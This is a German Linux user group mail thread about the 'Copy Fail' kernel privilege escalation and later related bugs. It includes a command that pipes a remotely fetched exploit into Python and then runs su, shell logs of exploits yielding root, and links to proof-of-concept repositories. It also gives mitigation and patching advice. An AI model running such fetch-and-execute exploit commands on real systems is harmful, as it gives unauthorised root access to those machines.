CVE-2026-31431

[Robert Penz]

Hi!

ich glaub das könnte interessant für recht viele hier sein

https://copy.fail/ -> The same 732-byte Python script roots every Linux
distribution shipped since 2017.

--
SG,
Robert Penz

[Richard Weinberger]

On Donnerstag, 30. April 2026 08:51 Robert Penz wrote:
> ich glaub das könnte interessant für recht viele hier sein
>
> https://copy.fail/ -> The same 732-byte Python script roots every Linux
> distribution shipped since 2017.

Das betrifft mal wieder einen Treiber bzw. Code
den so gut wie niemand verwendet, den der Angreifer aber nachlanden und triggern kann.

Daher ist es um so empfehlenswerter, dass man auf wichtigen Systemen das automatische
Nachladen von Kernel-Modulen komplett deaktiviert.

LG,
//richard

--
​​​​​sigma star gmbh | Eduard-Bodem-Gasse 6, 6020 Innsbruck, AUT UID/VAT Nr:
ATU 66964118 | FN: 374287y

[Christoph Lechleitner]

Am 30.04.26 um 08:59 schrieb Richard Weinberger:

> On Donnerstag, 30. April 2026 08:51 Robert Penz wrote:
>> ich glaub das könnte interessant für recht viele hier sein
>>
>> https://copy.fail/ -> The same 732-byte Python script roots every Linux
>> distribution shipped since 2017.
>
> Das betrifft mal wieder einen Treiber bzw. Code
> den so gut wie niemand verwendet, den der Angreifer aber nachlanden und triggern kann.
>
> Daher ist es um so empfehlenswerter, dass man auf wichtigen Systemen das automatische
> Nachladen von Kernel-Modulen komplett deaktiviert.

Danke für die generelle Info und diesen Tip!

lg Christoph


--

Christoph Lechleitner

Geschäftsführung

------------------------------------------------------------------------
ITEG IT-Engineers GmbH | Salurner Straße 18, A-6020 Innsbruck
FN 365826f | Handelsgericht Innsbruck | Mobiltelefon: +43 676 3674710
Mail: christoph....@iteg.at | Web: http://www.iteg.at/
------------------------------------------------------------------------

[Wolfgang Glas]

Hallo,

  kann das jemand nachvollziehen?

   Bei mir funktioniert der exploit nicht, ich verwende debian trixie

$ uname -a
Linux trixie-arm64 6.12.74+deb13+1-arm64 #1 SMP Debian 6.12.74-2 (2026-03-08) aarch64 GNU/Linux

$ python3 ./copy_fail_exp.py
$ id
uid=1000(wglas) gid=1000(wglas) groups=1000(wglas),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),102(scanner),106(lpadmin),113(docker),121(wireshark)

  Grüße von der Koralmbahn, Wolfgang

 

--
Tipp: Stammtischkalender (Google-Kalender) "linuxuser...@gmail.com"
in die eigene Terminverwaltung einbinden. Siehe: http://www.lugt.at/p/stammtisch.html
---
Sie erhalten diese Nachricht, weil Sie Mitglied der Google Groups-Gruppe "Linux User Group Tirol" sind.
Wenn Sie sich von dieser Gruppe abmelden und keine E-Mails mehr von dieser Gruppe erhalten möchten, senden Sie eine E-Mail an linuxusergroupt...@googlegroups.com.
Diese Diskussion finden Sie unter https://groups.google.com/d/msgid/linuxusergrouptirol/c4648038-6476-4105-9db8-78d7147416ea%40iteg.at.

--

Wolfgang Glas

Liebeneggstr. 7/15

6020 Innsbruck

+43 676 3674740

[Robert Penz]

On 2026-04-30 10:40, Wolfgang Glas wrote:
> $ uname -a
> Linux trixie-arm64 6.12.74+deb13+1-arm64 #1 SMP Debian 6.12.74-2
> (2026-03-08) aarch64 GNU/Linux
> $ python3 ./copy_fail_exp.py
> $ id
> uid=1000(wglas) gid=1000(wglas)
> groups=1000(wglas),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),102(scanner),106(lpadmin),113(docker),121(wireshark)

nach dem python script "su" eintippen

$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)


--
SG,
Robert Penz

[Wolfgang Glas]

Hallo Robert,

  das habe ich auch probiert, funktioniert nicht.

  Ist der exploit evtl. x86-64 only?

  Ich habe arm64...

   Wolfgang

[Richard Weinberger]

Hallo!

Das der eine Exploit überall so easy geht halte ich für
einen Marketingstunt.
Besonders wenn man sich die Webseite so anschaut, das ist alles Werbung.

[Robert Penz]

On 2026-04-30 10:56, Wolfgang Glas wrote:
> Hallo Robert,
>
> das habe ich auch probiert, funktioniert nicht.
>
> Ist der exploit evtl. x86-64 only?
>
> Ich habe arm64...
>
> Wolfgang

das kann leicht sein, dass das für x86_64 und nicht arm ist das
Beispiel-Teil. Man kann ja mal eine gute KI Fragen ob es einen das
umschreibt für arm64?

--
SG,
Robert Penz

[Robert Penz]

Hi!

Der vollständigkeitshalber :-)

Achtung an die, die den Exploit ausprobieren - This poisoned cache
persists even if the module is unloaded. --> d.h. rebooten nachher oder
su bleibt auch ohne Script manipuliert

--
SG,
Robert Penz

[David Gstir]

Hi Wolfgang!

Wolfgang Glas schrieb am Donnerstag, 30. April 2026 um 10:56:56 UTC+2:

Hallo Robert,

  das habe ich auch probiert, funktioniert nicht.

  Ist der exploit evtl. x86-64 only?

  Ich habe arm64...

den offiziellen PoC habe ich nicht getestet, aber hier https://github.com/badsectorlabs/copyfail-go

hat das jemand deutlich lesbarer in Go programmiert und das läuft hier unter aarch64: 

$ ./copyfail --backup /tmp/su
2026/05/04 13:55:51 Backed up /usr/bin/su to /tmp/su
2026/05/04 13:55:51 Overwriting page cache of /usr/bin/su with 172 bytes
2026/05/04 13:55:51   ... wrote 4 bytes
2026/05/04 13:55:51   ... wrote 104 bytes
2026/05/04 13:55:51   ... wrote 172 bytes
2026/05/04 13:55:51 Executing payload

# id
uid=0(root) ...

Das GitHub repo liefert noch payloads für andere gängige Architekturen...

SG, David

[Wolfgang Glas]

Hallo David, danke für den link zum erweiterten exploit.

Ich habe mittlerweile das trixie kernel update eingespielt.

Interessant ist, dass lt. https://security-tracker.debian.org/tracker/DSA-6238-1 eine ganze Reihe von CVEs gefixt wurde, alle vermutlich vom gleichen tool-basierten Review entdeckt.

  LG Wolfgang 

Wolfgang Glas

Liebeneggstr. 7/15

6020 Innsbruck

+43 676 3674740

--

Tipp: Stammtischkalender (Google-Kalender) "linuxuser...@gmail.com"
in die eigene Terminverwaltung einbinden. Siehe: http://www.lugt.at/p/stammtisch.html
---

Sie erhalten diese Nachricht, weil Sie in Google Groups E-Mails von der Gruppe "Linux User Group Tirol" abonniert haben.

Wenn Sie sich von dieser Gruppe abmelden und keine E-Mails mehr von dieser Gruppe erhalten möchten, senden Sie eine E-Mail an linuxusergroupt...@googlegroups.com.

Diese Diskussion finden Sie unter https://groups.google.com/d/msgid/linuxusergrouptirol/1111538a-44e0-41cf-870d-cff14c896028n%40googlegroups.com.

[Robert Penz]

On 2026-04-30 12:13, Robert Penz wrote:

und es geht weiter wie angekündigt/vermutet

https://www.openwall.com/lists/oss-security/2026/05/07/8
https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo


--
SG,
Robert Penz

[Richard Weinberger]

Inzwischen sind wir schon bei CopyFile v3:
https://github.com/v12-security/pocs/tree/main/fragnesia

Aber was ich eigentlich sagen wollte, alle schauen auf Linux und machen dazu Webseiten/Blogs/Panik...

Dazu tun sich im Hintergrad derzeit ein paar andere wirklich üble Bugs auf,
die kaum Beachtung finden. Allesamt remote(!) exploitbar.

Exim:
https://www.openwall.com/lists/oss-security/2026/05/12/4

dnsmasq:
https://www.openwall.com/lists/oss-security/2026/05/11/10

Apache httpd:
https://www.openwall.com/lists/oss-security/2026/05/04/19

OpenBSD iked:
https://www.openbsd.org/errata78.html

...

Also updaten bzw. prüfen ob die jeweilige Distro Updates hat...

[Richard Weinberger]

On Donnerstag, 14. Mai 2026 10:21 Richard Weinberger wrote:
> Inzwischen sind wir schon bei CopyFile v3:

...sollte natürlich "fail" nicht "file" lauten. :-D

[rob...@penz.name]

Hi,

Jo, aber die Mitigation vom alten zieht. 

:-)

[rob...@penz.name]

Viel spannender ist der RCE in nginx der gerade gekommen ist, seit 2008 wohl alles betroffen. 

[rob...@penz.name]

Oh url vergessen 

https://github.com/DepthFirstDisclosures/Nginx-Rift

--
Tipp: Stammtischkalender (Google-Kalender) "linuxuser...@gmail.com"
in die eigene Terminverwaltung einbinden. Siehe: http://www.lugt.at/p/stammtisch.html
---
Sie erhalten diese Nachricht, weil Sie in Google Groups E-Mails von der Gruppe "Linux User Group Tirol" abonniert haben.
Wenn Sie sich von dieser Gruppe abmelden und keine E-Mails mehr von dieser Gruppe erhalten möchten, senden Sie eine E-Mail an linuxusergroupt...@googlegroups.com.

Diese Diskussion finden Sie unter https://groups.google.com/d/msgid/linuxusergrouptirol/2f57546d-407a-4127-ac51-8cfa54eafb91%40email.android.com.